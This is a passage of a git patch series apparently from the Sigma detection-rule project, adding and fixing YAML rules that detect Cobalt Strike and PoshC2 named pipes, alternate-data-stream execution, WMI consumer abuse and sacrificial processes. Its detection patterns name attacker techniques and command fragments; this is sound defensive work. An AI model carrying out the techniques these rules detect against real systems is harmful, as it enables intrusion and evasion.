- PipeName|re: '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index c9a3da84..da7bb0a7 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -13,7 +13,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection_malleable_profiles: PipeName|startswith: From 80dbfa7af5781efc858bcc3054788572ade46e55 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 13:52:09 +0200 Subject: [PATCH 0677/1367] add process_creation_alternate_data_streams.yml --- ...rocess_creation_alternate_data_streams.yml | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_alternate_data_streams.yml diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml new file mode 100644 index 00000000..f98b1f01 --- /dev/null +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml @@ -0,0 +1,57 @@ +title: Execute From Alternate Data Streams +id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c +status: experimental +author: frack113 +date: 2021/0901 +description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md +tags: + - attack.defense_evasion + - attack.t1564.004 +logsource: + category: process_creation + product: windows +detection: + selection_stream: + CommandLine|contains: 'txt:' + selection_tools_type: + CommandLine|contains|all: + - 'type ' + - ' > ' + selection_tools_findstr: + CommandLine|contains|all: + - 'findstr ' + - ' /V ' + - ' /L ' + selection_tools_makecab: + CommandLine|contains|all: + - 'makecab ' + - '.cab' + selection_tools_dir: + CommandLine|contains|all: + - 'print ' + - '/D:' + selection_tools_reg: + CommandLine|contains|all: + - 'reg ' + - ' export ' + selection_tools_regedit: + CommandLine|contains|all: + - 'regedit ' + - ' /E ' + selection_tools_regedit: + CommandLine|contains|all: + - 'regedit ' + - ' /E ' + selection_tools_esentutl: + CommandLine|contains|all: + - 'esentutl ' + - ' /y ' + - ' /d ' + - ' /o ' + + condition: selection_stream and (1 of selection_tools_*) +falsepositives: + - Unknown +level: medium From affc929c3b49e3d3cbdb1cfce4cebc7e01573467 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:54:47 +0200 Subject: [PATCH 0678/1367] LiquidSnake named pipe --- rules/windows/pipe_created/sysmon_mal_namedpipes.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml index e425bf51..f8fbc077 100644 --- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml +++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml @@ -34,6 +34,7 @@ detection: - '\Posh*' #PoshC2 default - '\jaccdpqnvbrrxlaf' #PoshC2 default - '\csexecsvc' #CSEXEC default + - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake https://github.com/RiccardoAncarani/LiquidSnake condition: selection tags: - attack.defense_evasion From e71fce6f11a11c1b14aebf59b47f1bfb42d8f8f2 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 13:55:14 +0200 Subject: [PATCH 0679/1367] fix errors --- ...rocess_creation_alternate_data_streams.yml | 109 +++++++++--------- 1 file changed, 52 insertions(+), 57 deletions(-) diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml index f98b1f01..643417f3 100644 --- a/rules/windows/process_creation/process_creation_alternate_data_streams.yml +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml @@ -1,57 +1,52 @@ -title: Execute From Alternate Data Streams -id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c -status: experimental -author: frack113 -date: 2021/0901 -description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md -tags: - - attack.defense_evasion - - attack.t1564.004 -logsource: - category: process_creation - product: windows -detection: - selection_stream: - CommandLine|contains: 'txt:' - selection_tools_type: - CommandLine|contains|all: - - 'type ' - - ' > ' - selection_tools_findstr: - CommandLine|contains|all: - - 'findstr ' - - ' /V ' - - ' /L ' - selection_tools_makecab: - CommandLine|contains|all: - - 'makecab ' - - '.cab' - selection_tools_dir: - CommandLine|contains|all: - - 'print ' - - '/D:' - selection_tools_reg: - CommandLine|contains|all: - - 'reg ' - - ' export ' - selection_tools_regedit: - CommandLine|contains|all: - - 'regedit ' - - ' /E ' - selection_tools_regedit: - CommandLine|contains|all: - - 'regedit ' - - ' /E ' - selection_tools_esentutl: - CommandLine|contains|all: - - 'esentutl ' - - ' /y ' - - ' /d ' - - ' /o ' - - condition: selection_stream and (1 of selection_tools_*) -falsepositives: - - Unknown -level: medium +title: Execute From Alternate Data Streams +id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c +status: experimental +author: frack113 +date: 2021/0901 +description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md +tags: + - attack.defense_evasion + - attack.t1564.004 +logsource: + category: process_creation + product: windows +detection: + selection_stream: + CommandLine|contains: 'txt:' + selection_tools_type: + CommandLine|contains|all: + - 'type ' + - ' > ' + selection_tools_findstr: + CommandLine|contains|all: + - 'findstr ' + - ' /V ' + - ' /L ' + selection_tools_makecab: + CommandLine|contains|all: + - 'makecab ' + - '.cab' + selection_tools_print: + CommandLine|contains|all: + - 'print ' + - '/D:' + selection_tools_reg: + CommandLine|contains|all: + - 'reg ' + - ' export ' + selection_tools_regedit: + CommandLine|contains|all: + - 'regedit ' + - ' /E ' + selection_tools_esentutl: + CommandLine|contains|all: + - 'esentutl ' + - ' /y ' + - ' /d ' + - ' /o ' + condition: selection_stream and (1 of selection_tools_*) +falsepositives: + - Unknown +level: medium From 8761927e8ce691486646adc8cc61c4364a5e2b29 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:57:17 +0200 Subject: [PATCH 0680/1367] rule: susp scrcons.exe creating named pipe --- .../sysmon_susp_wmi_consumer_namedpipe.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml diff --git a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml new file mode 100644 index 00000000..1d4e7e24 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml @@ -0,0 +1,23 @@ +title: WMI Event Consumer Created Named Pipe +id: 493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb +status: experimental +description: Detects the WMI Event Consumer service scrcons.exe creating a named pipe +references: + - https://github.com/RiccardoAncarani/LiquidSnake +date: 2021/09/01 +author: Florian Roth +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 +logsource: + product: windows + category: pipe_created + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' +detection: + selection: + Image|endswith: '\scrcons.exe' + condition: selection +falsepositives: + - Unknown +level: high From e787420be1d013c0f0ae93993d23e327b711ae70 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:57:36 +0200 Subject: [PATCH 0681/1367] rule: WMI filter content encoded executable --- .../sysmon_wmi_susp_encoded_scripts.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml new file mode 100644 index 00000000..03338301 --- /dev/null +++ b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml @@ -0,0 +1,28 @@ +title: Suspicious Encoded Scripts in a WMI Consumer +id: 83844185-1c5b-45bc-bcf3-b5bf3084ca5b +status: experimental +description: Detects suspicious encoded payloads in WMI Event Consumers +author: Florian Roth +references: + - https://github.com/RiccardoAncarani/LiquidSnake +date: 2021/09/01 +tags: + - attack.t1086 # an old one + - attack.execution + - attack.t1059.005 +logsource: + product: windows + category: wmi_event +detection: + selection_destination: + - Destination|base64offset|contains: + - 'WriteProcessMemory' + - 'This program cannot be run in DOS mode' + - 'This program must be run under Win32' + condition: selection_destination +fields: + - User + - Operation +falsepositives: + - Unknown +level: high From 505140d273553f4a2db27b3323b26e5ca7ec10f6 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:57:48 +0200 Subject: [PATCH 0682/1367] rule: extended WMI suspicious scripts rule --- .../windows/wmi_event/sysmon_wmi_susp_scripting.yml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml b/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml index bea1f3af..e4b7fbf1 100644 --- a/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml +++ b/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml @@ -6,7 +6,9 @@ author: Florian Roth, Jonhnathan Ribeiro references: - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/ - https://github.com/Neo23x0/signature-base/blob/master/yara/gen_susp_lnk_files.yar#L19 + - https://github.com/RiccardoAncarani/LiquidSnake date: 2019/04/15 +modified: 2021/09/01 tags: - attack.t1086 # an old one - attack.execution @@ -15,8 +17,6 @@ logsource: product: windows category: wmi_event detection: - selection: - EventID: 20 selection_destination: - Destination|contains|all: - 'new-object' @@ -33,10 +33,13 @@ detection: - ' -noprofile ' - ' -decode ' - ' -enc ' - condition: selection and selection_destination + - Destination|contains: + - 'WScript.Shell' + - 'System.Security.Cryptography.FromBase64Transform' + condition: selection_destination fields: - - CommandLine - - ParentCommandLine + - User + - Operation falsepositives: - Administrative scripts level: high From 2dbbaf01809d6e8ce77109f59b174a039f649c75 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 14:00:55 +0200 Subject: [PATCH 0683/1367] fix missing char in date --- .../process_creation_alternate_data_streams.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml index 643417f3..7460de70 100644 --- a/rules/windows/process_creation/process_creation_alternate_data_streams.yml +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml @@ -2,7 +2,7 @@ title: Execute From Alternate Data Streams id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c status: experimental author: frack113 -date: 2021/0901 +date: 2021/09/01 description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md From 1aac21ba791a514e7ad3dac814765d56189f8a34 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 14:03:42 +0200 Subject: [PATCH 0684/1367] fix: single list item issue --- rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml index 03338301..84a04fba 100644 --- a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml +++ b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml @@ -15,7 +15,7 @@ logsource: category: wmi_event detection: selection_destination: - - Destination|base64offset|contains: + Destination|base64offset|contains: - 'WriteProcessMemory' - 'This program cannot be run in DOS mode' - 'This program must be run under Win32' From deefcaa8ac7e2b9eea10a725808f3e9ba1e35068 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 1 Sep 2021 14:33:27 +0200 Subject: [PATCH 0685/1367] fix: prevent possible FPs with the respective command only used as the last parameter --- .../win_bad_opsec_sacrificial_processes.yml | 4 ++++ rules/windows/process_creation/win_susp_procs_req_dlls.yml | 6 ++++++ 2 files changed, 10 insertions(+) diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index bce196ae..efe436c9 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -4,6 +4,7 @@ status: experimental description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' author: 'Oleg Kolesnikov @securonix invrep_de, oscd.community' date: 2020/10/23 +modified: 2021/09/01 references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec @@ -16,6 +17,9 @@ logsource: product: windows detection: selection: + Image|endswith: + - '\WerFault.exe' + - '\rundll32.exe' CommandLine|endswith: - '\WerFault.exe' - '\rundll32.exe' diff --git a/rules/windows/process_creation/win_susp_procs_req_dlls.yml b/rules/windows/process_creation/win_susp_procs_req_dlls.yml index d52158f8..dcbadaf4 100644 --- a/rules/windows/process_creation/win_susp_procs_req_dlls.yml +++ b/rules/windows/process_creation/win_susp_procs_req_dlls.yml @@ -10,11 +10,17 @@ references: - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback author: Florian Roth date: 2021/05/27 +modified: 2021/09/01 logsource: category: process_creation product: windows detection: selection: + Image|endswith: + - '\rundll32.exe' + - '\regsvcs.exe' + - '\regasm.exe' + - '\regsvr32.exe' CommandLine|endswith: - '\rundll32.exe' - '\regsvcs.exe' From ae9966bdccbaf25e8e2be224424edf99ed9c1494 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 1 Sep 2021 14:48:32 +0200 Subject: [PATCH 0686/1367] fix: unifying two overlapping rules --- .../win_bad_opsec_sacrificial_processes.yml | 22 ++++++++++- .../win_susp_procs_req_dlls.yml | 39 ------------------- 2 files changed, 20 insertions(+), 41 deletions(-) delete mode 100644 rules/windows/process_creation/win_susp_procs_req_dlls.yml diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index efe436c9..8fc81f3a 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -2,12 +2,17 @@ title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments id: a7c3d773-caef-227e-a7e7-c2f13c622329 status: experimental description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' -author: 'Oleg Kolesnikov @securonix invrep_de, oscd.community' +author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard date: 2020/10/23 modified: 2021/09/01 references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec + - https://twitter.com/CyberRaiju/status/1251492025678983169 + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32 + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 + - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool + - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback tags: - attack.defense_evasion - attack.t1085 # an old one @@ -20,10 +25,23 @@ detection: Image|endswith: - '\WerFault.exe' - '\rundll32.exe' + - '\regsvcs.exe' + - '\regasm.exe' + - '\regsvr32.exe' CommandLine|endswith: - '\WerFault.exe' - '\rundll32.exe' - condition: selection + - '\regsvcs.exe' + - '\regasm.exe' + - '\regsvr32.exe' + filter1: + ParentImage|contains: + - '\AppData\Local\' + - '\Microsoft\Edge\' + condition: selection and not filter1 +fields: + - ParentImage + - ParentCommandLine falsepositives: - Unlikely level: high diff --git a/rules/windows/process_creation/win_susp_procs_req_dlls.yml b/rules/windows/process_creation/win_susp_procs_req_dlls.yml deleted file mode 100644 index dcbadaf4..00000000 --- a/rules/windows/process_creation/win_susp_procs_req_dlls.yml +++ /dev/null @@ -1,39 +0,0 @@ -title: Suspicious Process Start Without DLL -id: f5647edc-a7bf-4737-ab50-ef8c60dc3add -description: Detects suspicious start of program that usually requires a DLL as parameter, which can be a sign of process injection or hollowing activity -status: experimental -references: - - https://twitter.com/CyberRaiju/status/1251492025678983169 - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32 - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 - - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool - - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback -author: Florian Roth -date: 2021/05/27 -modified: 2021/09/01 -logsource: - category: process_creation - product: windows -detection: - selection: - Image|endswith: - - '\rundll32.exe' - - '\regsvcs.exe' - - '\regasm.exe' - - '\regsvr32.exe' - CommandLine|endswith: - - '\rundll32.exe' - - '\regsvcs.exe' - - '\regasm.exe' - - '\regsvr32.exe' - filter1: - ParentImage|contains: - - '\AppData\Local\' - - '\Microsoft\Edge\' - condition: selection and not filter1 -fields: - - ParentImage - - ParentCommandLine -falsepositives: - - Possible but rare -level: high From 0b38237dbff215b899cf33ee134491a13601f541 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 1 Sep 2021 15:38:29 +0200 Subject: [PATCH 0687/1367] fix: add relation to now obsolete rule --- .../process_creation/win_bad_opsec_sacrificial_processes.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index 8fc81f3a..0b3481e0 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -1,6 +1,9 @@ title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments id: a7c3d773-caef-227e-a7e7-c2f13c622329 status: experimental +related: + - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add + type: obsoletes description: 'Detects attackers using tooling with bad opsec defaults e.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.' author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard date: 2020/10/23 From 2f7f050ad811640809164b42e8ffc231b53e3952 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 16:32:27 +0200 Subject: [PATCH 0688/1367] fix: removed tags --- .../pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml index 1d4e7e24..44954d47 100644 --- a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml @@ -6,10 +6,6 @@ references: - https://github.com/RiccardoAncarani/LiquidSnake date: 2021/09/01 author: Florian Roth -tags: - - attack.defense_evasion - - attack.privilege_escalation - - attack.t1055 logsource: product: windows category: pipe_created From b0c2d7b75ae24dc49bbd860f6a7ce2698cd21154 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 16:34:50 +0200 Subject: [PATCH 0689/1367] fix: tags for WMI / execution / persistence --- rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml index 84a04fba..5388798c 100644 --- a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml +++ b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml @@ -7,9 +7,10 @@ references: - https://github.com/RiccardoAncarani/LiquidSnake date: 2021/09/01 tags: - - attack.t1086 # an old one - attack.execution - - attack.t1059.005 + - attack.t1047 + - attack.persistence + - attack.t1546.003 logsource: product: windows category: wmi_event From e83ee55573e0adf9cc15884b74036da1effe149e Mon Sep 17 00:00:00 2001 From: Konstantin Klinger Date: Wed, 1 Sep 2021 17:05:36 +0200 Subject: [PATCH 0690/1367] remove duplicate --- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 150b8dda..429b3016 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -41,7 +41,6 @@ detection: - PipeName|re: '\\f53f[0-9a-f]{2}' - PipeName|re: '\\rpc_[0-9a-f]{2}' - PipeName|re: '\\spoolss_[0-9a-f]{2}' - - PipeName|re: '\\windows\.update\.manager[0-9a-f]{3}' - PipeName|re: '\\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,' condition: selection falsepositives: From 457da818a40e8bd8f6174de94a0cdbae433d5181 Mon Sep 17 00:00:00 2001 From: Konstantin Klinger Date: Wed, 1 Sep 2021 17:06:55 +0200 Subject: [PATCH 0691/1367] regex optimisations --- .../pipe_created/sysmon_mal_cobaltstrike_re.yml | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 429b3016..cd4c42d0 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -18,20 +18,15 @@ logsource: definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection: - - PipeName|re: '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' - - PipeName|re: '\\mojo\.5688\.8052\.35780273329370473[0-9a-f]{2}' - - PipeName|re: '\\wkssvc[0-9a-f]{2}' - - PipeName|re: '\\wkssvc_[0-9a-f]{2}' + - PipeName|re: '\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' + - PipeName|re: '\\wkssvc_?[0-9a-f]{2}' - PipeName|re: '\\ntsvcs[0-9a-f]{2}' - PipeName|re: '\\DserNamePipe[0-9a-f]{2}' - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}' - - PipeName|re: '\\mypipe\-f[0-9a-f]{2}' - - PipeName|re: '\\mypipe\-h[0-9a-f]{2}' - - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2}' - - PipeName|re: '\\windows\.update\.manager[0-9a-f]{3}' + - PipeName|re: '\\mypipe\-(?:f|h)[0-9a-f]{2}' + - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2,3}' - PipeName|re: '\\ntsvcs_[0-9a-f]{2}' - - PipeName|re: '\\scerpc_[0-9a-f]{2}' - - PipeName|re: '\\scerpc[0-9a-f]{2}' + - PipeName|re: '\\scerpc_?[0-9a-f]{2}' - PipeName|re: '\\PGMessagePipe[0-9a-f]{2}' - PipeName|re: '\\MsFteWds[0-9a-f]{2}' - PipeName|re: '\\f4c3[0-9a-f]{2}' From 1ba0a7c7a3557a43d87e14b3bd1d3917f24195c8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 19:38:35 +0200 Subject: [PATCH 0692/1367] add missing tags --- .../windows/file_event/sysmon_tsclient_filewrite_startup.yml | 3 +++ rules/windows/other/win_defender_amsi_trigger.yml | 5 ++++- rules/windows/other/win_defender_threat.yml | 3 +++ .../windows/registry_event/sysmon_reg_vbs_payload_stored.yml | 3 +++ .../registry_event/sysmon_sysinternals_eula_accepted.yml | 3 +++ 5 files changed, 16 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_tsclient_filewrite_startup.yml b/rules/windows/file_event/sysmon_tsclient_filewrite_startup.yml index c171dcdf..d11fd2b3 100755 --- a/rules/windows/file_event/sysmon_tsclient_filewrite_startup.yml +++ b/rules/windows/file_event/sysmon_tsclient_filewrite_startup.yml @@ -15,3 +15,6 @@ detection: falsepositives: - unknown level: high +tags: + - attack.command_and_control + - attack.t1219 \ No newline at end of file diff --git a/rules/windows/other/win_defender_amsi_trigger.yml b/rules/windows/other/win_defender_amsi_trigger.yml index f872bf22..2478a55c 100644 --- a/rules/windows/other/win_defender_amsi_trigger.yml +++ b/rules/windows/other/win_defender_amsi_trigger.yml @@ -17,4 +17,7 @@ detection: condition: selection falsepositives: - unlikely -level: high \ No newline at end of file +level: high +tags: + - attack.execution + - attack.t1059 \ No newline at end of file diff --git a/rules/windows/other/win_defender_threat.yml b/rules/windows/other/win_defender_threat.yml index 9721af7b..76413e11 100644 --- a/rules/windows/other/win_defender_threat.yml +++ b/rules/windows/other/win_defender_threat.yml @@ -20,3 +20,6 @@ detection: falsepositives: - unlikely level: high +tags: + - attack.execution + - attack.t1059 \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_reg_vbs_payload_stored.yml b/rules/windows/registry_event/sysmon_reg_vbs_payload_stored.yml index 0104e1bf..058178fc 100644 --- a/rules/windows/registry_event/sysmon_reg_vbs_payload_stored.yml +++ b/rules/windows/registry_event/sysmon_reg_vbs_payload_stored.yml @@ -29,3 +29,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.persistence + - attack.t1547.001 \ No newline at end of file diff --git a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml b/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml index 717e6b93..e526a09c 100755 --- a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml +++ b/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml @@ -11,6 +11,9 @@ falsepositives: - Legitimate use of SysInternals tools - Programs that use the same Registry Key level: low +tags: + - attack.resource_development + - attack.t1588.002 --- logsource: product: windows From e0cd35261cd47bc50ae84394ddef8f04a606c21e Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 20:01:03 +0200 Subject: [PATCH 0693/1367] add missing tags --- .../process_creation/win_susp_cmd_shadowcopy_access.yml | 3 +++ .../windows/process_creation/win_susp_rundll32_inline_vbs.yml | 3 +++ .../process_creation/win_susp_screenconnect_access.yml | 3 +++ rules/windows/process_creation/win_susp_userinit_child.yml | 3 +++ .../registry_event/sysmon_suspicious_keyboard_layout_load.yml | 4 +++- 5 files changed, 15 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml index 319eef8e..9b475340 100644 --- a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml +++ b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml @@ -17,3 +17,6 @@ detection: falsepositives: - Some rare backup scenarios level: medium +tags: + - attack.impact + - attack.t1490 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_rundll32_inline_vbs.yml b/rules/windows/process_creation/win_susp_rundll32_inline_vbs.yml index e85f144e..7018898a 100644 --- a/rules/windows/process_creation/win_susp_rundll32_inline_vbs.yml +++ b/rules/windows/process_creation/win_susp_rundll32_inline_vbs.yml @@ -20,3 +20,6 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.defense_evasion + - attack.t1055 \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_screenconnect_access.yml b/rules/windows/process_creation/win_susp_screenconnect_access.yml index 